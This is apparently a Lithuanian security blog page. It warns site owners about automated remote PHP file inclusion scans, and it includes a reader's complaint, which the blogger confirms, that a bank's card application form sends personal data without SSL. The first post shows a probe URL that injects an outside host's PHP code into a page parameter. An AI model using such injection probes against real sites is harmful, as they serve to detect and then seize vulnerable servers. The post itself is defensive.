Per pasaulį keliauja automatizuota pažeidžiamumų paieška. Šiandien ji vėl užsuko į Lietuvą. Tikslas tokios paieškos paprastas - rasti tinklalapius, kuriuose galima vykdyti PHP programinį kodą iš nutolusių šaltinių. Pažeidžiamumų paieška vyksta per HTTP protokolo GET užklausų parametrus. T.y. per adreso eilutę. Pvz. Jei kažkokią informaciją iš puslapio galima pasiekti adresu www.isec.lt/page.php?id=1, tai pažeidžiamumas tikrinamas suformauojant tokį adresą: www.isec.lt/page.php?id=http://sahel55.com/articles/omaduro/kimumid/. Ir tas pats bandoma su visais adreso parametrais. Jei nueisit adresu http://sahel55.com/articles/omaduro/kimumid/, tai nerasit nieko daugiau, tik vieną PHP kodo eilutę:

Jei Jūsų serveris šios eilutės neapdoros, tai nieko ir neįvyks. Bet jei Jūsų serveris išskaičiuos MD5 ir pateiks kaip atsakymą į užklausą, tai automatinės pažeidžiamumo paieškos autoriams turėtų būti ženklas, kad galima perimti Jūsų serverio valdymą. Ir jie turbūt tai padarys. Neabejoju, kad su lietuviškais tinklalapiais jiems tikrai pasiseks. Po kelių dienų laukim pranešimo spaudoje su kokia nors tokia antrašte: “Arabų programišiai išdarkė daugiau nei pusę lietuviškų tinklalapių”. Dabar Jūs eikit žiūrėti savo tinklalapio log’ų ar pas jus šis testas dar nebuvo užsukęs ir ar jam nepasisekė, o aš einu paspęsiu spąstus tolimesnei analizei. Tikiuosi spąstai suveiks.

Laba diena,

Prenumeruoju Jūsų blog’o informacijosapsauga.lt rss, gvildenamos temos man aktualios ir įdomios. Nusprendžiau parašyti aptikęs mano supratimu tikrą nesirūpinimo duomenų apsauga atvejį, gal Jums tai bus įdomu. Siunčiau ir “rekomenduok draugui” iš aptikto puslapio, bet nesu tikras kad gavote.

Taigi radinys - http://www.parex.lt/lt/card_paraiska/5 , tai forma virtualiai Visa kortelei užsakyti. Ten nurodoma asmens kodas, paso duomenys ir t.t. Bet ar duomenys bus perduodami šifruotai? Ir ar nėra galimybės juos kam nors perimti?

Ačiū už dėmesį ir gerą blog’ą,

Antanas

Dėkui, Antanai, už gerus atsiliepimus apie BLOG’ą, tačiau šis laiškas mane šiek tiek labiau nustebino kitkuo. Nustebino tuo, kad tai pirmas mano matomas atvejis, kada žmogus susirūpina ar jo asmeniniai duomenys iš naršyklės iki serverio bus iš tiesų perduodami saugiai ir niekas nesugebės jų perimti. Taip, laiško autorius yra teisus. Duomenys bus perduodami nešifruoti per velniai žino kiek serverių ir kitų tarpininkų. O duomenų prašoma daug ir pakankamai konfidencialių. Vietiniame tinkle (pvz. kavinėje su Zebra) esantis gudresnis kolega taip pat gali tokius duomenis perimti ir nebūdamas tarpiniu serveriu. Todėl čia turėtų būti naudojamas SSL protokolas, kuris užtikrintų perduodamų duomenų šifravimą. Tokio protokolo naudojimą puslapyje galima atskirti pagal adreso pradžią. Ji turi būti ne http://, bet https://. Taip, su papildoma raide S. Į technines detales nesigilinsiu, pasiskaitysit patys. Anksčiau žmonės į jų perduodamų duomenų saugumą visiškai nekreipdavo dėmesio ir nematydavo jokio skirtumo tarp puslapio su SSL ir puslapio be SSL. Pagal šį laišką atrodo, kad situacija po truputį keičiasi ir klientai jau geriau už patį banką pradeda gaudytis kaip turi būti persiunčiami asmeniniai duomenys.

P.S.

PAREX bankas vadovaujasi šiomis vertybėmis:

* kokybė;
* kūrybingumas ir profesionalumas;
* abipusis pasitikėjimas;
* atsakomybė klientams ir akcininkams;
* turinys svarbiau už formą;
* išmintinga bankininkystė.